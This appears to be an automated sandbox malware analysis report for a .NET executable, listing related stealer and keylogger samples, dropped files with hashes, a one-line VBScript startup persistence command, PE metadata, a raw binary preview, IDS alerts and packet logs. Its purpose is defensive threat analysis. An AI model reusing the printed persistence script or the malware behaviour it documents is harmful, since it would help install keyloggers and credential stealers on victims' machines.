                                                                        54328bd36c14bd82ddaa0c04b25ed9adNovember Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 172.67.177.134
                                                                        VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        3b5074b1b5d032e5620f69f9f700ff0eidk_1.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.21.1.182
                                                                        FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.21.1.182
                                                                        Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                        • 104.21.1.182
                                                                        PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                        • 104.21.1.182
                                                                        CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.21.1.182
                                                                        New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.21.1.182
                                                                        November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 104.21.1.182
                                                                        #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.1.182
                                                                        WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 104.21.1.182
                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.1.182

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):81
                                                                        Entropy (8bit):4.742318022436999
                                                                        Encrypted:false
                                                                        SSDEEP:3:FER/n0eFHHoUkh4EaKC5dfEHHn:FER/lFHI9aZ5dfI
                                                                        MD5:C088EFFEEED32535B6399F17B834E3F5
                                                                        SHA1:ECE576AA8D642C635B7CD70B234C7F9CFFC5E425
                                                                        SHA-256:59FD91F56C166BCB30C5BD83FB3FC2225F41A2F8A41A4F224E5767B43FBC8BE2
                                                                        SHA-512:798DA8F6B3906A5C5E335CD7E07E67FE99C07E723DBA979884E28A83326DEC7CD7EB673D63AB345A7E3B06380F53FF3F88CD88D7768311BE2B8F896FA4EC1CF5
                                                                        Malicious:true
                                                                        Reputation:low
                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ishon.exe"""

                                                                        C:\Users\user\AppData\Roaming\ishon.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):545600
                                                                        Entropy (8bit):5.127466954069092
                                                                        Encrypted:false
                                                                        SSDEEP:6144:CecUj2wJOTSYPagobSxxIxx0xxxxxxxGsrw3IX7a6plD:CecE2wGGsLV
                                                                        MD5:08565A4A256FB8F4F3497C695991829F
                                                                        SHA1:B2C4D59213108FE33197E3685B1602F56047F62C
                                                                        SHA-256:B5D25A995424FD4D4FE5303CA4E90CEEB2794989F58213BDA32B29C8716C5CFB
                                                                        SHA-512:AF2ABD0960D15C9DCB6B168318BE8EA66B357C07BC23BFC74E4C0784300863798EAD484B4B76EC802139FE9D737164DF4D5DB95B31601E715FB43003FA617799
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                        Reputation:low
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.Cg.................>..........f]... ...`....@.. ....................................`..................................]..W....`...............6..@....`....................................................... ............... ..H............text...l=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc.......`.......4..............@..B................H]......H...........d............................................................0...........s#...}.....s$...}.....(%.....}.......(.... ....(h...(&...,. ....(h...s'...z...(.....(....s(...}......{.....()...}......(....(....*.:...(....(....*..0...........{....o*.......+...+r.(....-...Y..+c..{.....(+...}.......(.......(....(,......3...(....&....Y(-.......(....-...{.....()...}........XY.....0.*....0...........,..(....-..*..o.....T....o.....W3K..o.....W..,...+%.(.......Y.......(/.........

                                                                        C:\Users\user\AppData\Roaming\ishon.exe:Zone.Identifier

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.127466954069092
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:LAQfpnQvPQ.exe
                                                                        File size:545'600 bytes
                                                                        MD5:08565a4a256fb8f4f3497c695991829f
                                                                        SHA1:b2c4d59213108fe33197e3685b1602f56047f62c
                                                                        SHA256:b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb
                                                                        SHA512:af2abd0960d15c9dcb6b168318be8ea66b357c07bc23bfc74e4c0784300863798ead484b4b76ec802139fe9d737164df4d5db95b31601e715fb43003fa617799
                                                                        SSDEEP:6144:CecUj2wJOTSYPagobSxxIxx0xxxxxxxGsrw3IX7a6plD:CecE2wGGsLV
                                                                        TLSH:8EC45DACC2B8BCEBD41785B5DC76A5E1092BEF1894691E1A3829705325733933CB6C1F
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.Cg.................>..........f]... ...`....@.. ....................................`................................

                                                                        File Icon

                                                                        Icon Hash:7c64ccccd4e8f4cc

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x415d66
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6743B67E [Sun Nov 24 23:27:58 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 11/08/2021 20:00:00 10/08/2023 19:59:59
                                                                        Subject Chain
                                                                        • CN="Aicho Software Technology Co., LTD.", O="Aicho Software Technology Co., LTD.", L=\u5357\u4eac\u5e02, S=\u6c5f\u82cf\u7701, C=CN, SERIALNUMBER=91320192MA1YED3N92, OID.1.3.6.1.4.1.311.60.2.1.1=\u5357\u4eac\u7ecf\u6d4e\u6280\u672f\u5f00\u53d1\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u6c5f\u82cf\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                        Version:3
                                                                        Thumbprint MD5:074C8CEBBDDB8C1AE41B66D468CC1A95
                                                                        Thumbprint SHA-1:7A4D4234CF32049903B9CDE0C0A0DA6D28398EAD
                                                                        Thumbprint SHA-256:027CC9D52DBEA32673B1D2BCD891F9E4E70EE720B6C5A6A8ACA7B6F9FB90B066
                                                                        Serial:078048AB9392D8BF9BA2B3A1B7098014

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x15d0c0x57.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x6f390.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x836000x1d40.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x13d6c0x13e0074fd01d1cd2ee951fd6c2972ed737439False0.4663792256289308data6.04605122772323IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x160000x6f3900x6f400cc554a181a5a31f43e79df154890e338False0.19252984550561797data4.661710936186697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x860000xc0x200e03241e1e8641c6363a0867e3fc393aeFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x162b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6170212765957447
                                                                        RT_ICON0x167180x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.4598360655737705
                                                                        RT_ICON0x170a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3818011257035647
                                                                        RT_ICON0x181480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.28226141078838174
                                                                        RT_ICON0x1a6f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.22691308455361361
                                                                        RT_ICON0x1e9180x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.16452070632751734
                                                                        RT_ICON0x27dc00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.12943629480657753
                                                                        RT_ICON0x385e80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2703360.07427434387667545
                                                                        RT_ICON0x7a6100xa775PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced0.970771419907159
                                                                        RT_GROUP_ICON0x84d880x84data0.7045454545454546
                                                                        RT_VERSION0x84e0c0x3d0data0.40061475409836067
                                                                        RT_MANIFEST0x851dc0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-25T14:59:20.605221+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549712193.122.130.080TCP
                                                                        2024-11-25T14:59:23.433379+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549712193.122.130.080TCP
                                                                        2024-11-25T14:59:25.057130+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549724172.67.177.134443TCP
                                                                        2024-11-25T14:59:26.280113+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549727193.122.130.080TCP
                                                                        2024-11-25T14:59:28.002851+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549732172.67.177.134443TCP
                                                                        2024-11-25T14:59:31.118745+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549739172.67.177.134443TCP
                                                                        2024-11-25T14:59:48.136512+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549789193.122.130.080TCP
                                                                        2024-11-25T14:59:50.308425+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549789193.122.130.080TCP
                                                                        2024-11-25T14:59:52.091612+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549798172.67.177.134443TCP
                                                                        2024-11-25T14:59:53.464717+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549802193.122.130.080TCP
                                                                        2024-11-25T14:59:56.511566+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549814193.122.130.080TCP
                                                                        2024-11-25T14:59:59.495922+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549821193.122.130.080TCP
                                                                        2024-11-25T15:00:01.235169+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549824172.67.177.134443TCP
                                                                        2024-11-25T15:00:12.752103+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549851172.67.177.134443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 25, 2024 14:59:02.089159012 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:02.089190960 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:02.089278936 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:02.101361990 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:02.101386070 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:03.325763941 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:03.325922012 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:03.333640099 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:03.333653927 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:03.334436893 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:03.386547089 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:03.388592958 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:03.431351900 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.112917900 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.112972975 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.113003969 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.113025904 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.113051891 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.113082886 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.113111973 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.113137007 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.113173962 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.123732090 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.123814106 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.123827934 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.132002115 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.132227898 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.132236004 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.183378935 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.183396101 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.226836920 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.233743906 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.277108908 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.304860115 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.310848951 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.310899973 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.310909986 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.318198919 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.318274021 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.318285942 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.325473070 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.325535059 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.325548887 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.341522932 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.341588020 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.341602087 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.349603891 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.349662066 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.349669933 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.357764006 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.357829094 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.357836962 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.366007090 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.366296053 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.366314888 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.374047041 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.374103069 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.374110937 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.381711006 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.381763935 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.381774902 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.433414936 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.433434963 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.480310917 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.497291088 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.499649048 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.499737024 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.499758959 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.504466057 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.504522085 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.504530907 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.509320021 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.509391069 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.509397984 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.523734093 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.523757935 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.523823023 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.523840904 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.523864031 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.528460026 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.528537989 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.528546095 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.528589964 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.533343077 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.533425093 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.542743921 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.542763948 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.542824030 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.552062035 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.552126884 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.552140951 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.552184105 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.561568022 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.561645031 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.566308022 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.566375017 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.575695038 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.575769901 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.690090895 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.690176964 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.698920012 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.699029922 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.705517054 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.705580950 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.709376097 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.709577084 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.715516090 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.715584993 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.722678900 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.722749949 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.729983091 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.730067015 CET49710443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:04.733730078 CET44349710104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:04.733802080 CET49710443192.168.2.5104.21.1.182
